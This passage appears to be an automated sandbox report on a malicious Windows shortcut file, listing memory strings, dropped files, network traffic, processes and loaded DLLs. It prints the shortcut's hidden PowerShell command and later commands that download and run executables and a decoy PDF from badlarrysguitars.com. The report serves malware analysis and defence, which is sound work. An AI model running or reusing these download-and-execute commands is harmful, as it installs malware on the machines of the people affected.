Source: powershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1397020503.00000207CDFE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727025853.000001DAFA7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 00000012.00000002.2723434855.000001DAFA54F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727333636.000001DAFA820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2734761731.000001DAFC6F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA530000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA623000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727025853.000001DAFA7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: powershell.exe, 00000006.00000002.1631103048.000001D7FA7C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000006.00000002.1647699924.000001D7FCB31000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1634579286.000001D7FAA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1637567333.000001D7FC7B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1635286137.000001D7FC2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1631103048.000001D7FA7C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CDFE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1394439368.00000207CC55C000.00000004.00000020.00020000.00000000.sdmp, IFhqcKaIol.lnkString found in binary or memory: https://badlarrysguitars.com/share/drp.exe
Source: powershell.exe, 00000003.00000002.1389284394.00000207CA920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1392944424.00000207CAC10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1394439368.00000207CC55C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547715754.00000207E4BCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path(
Source: powershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badlarrysguitars.com/share/drp.exeel
Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1397020503.00000207CD332000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49794 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nthelper.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ctfmoon.exeJump to dropped file
Source: IFhqcKaIol.lnkLNK file: -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: classification engineClassification label: mal80.winLNK@29/56@2/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy5a0zic.jvn.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: IFhqcKaIol.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\nthelper.exe "C:\Users\user\AppData\Local\Temp\nthelper.exe"
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\nthelper.exe "C:\Users\user\AppData\Local\Temp\nthelper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
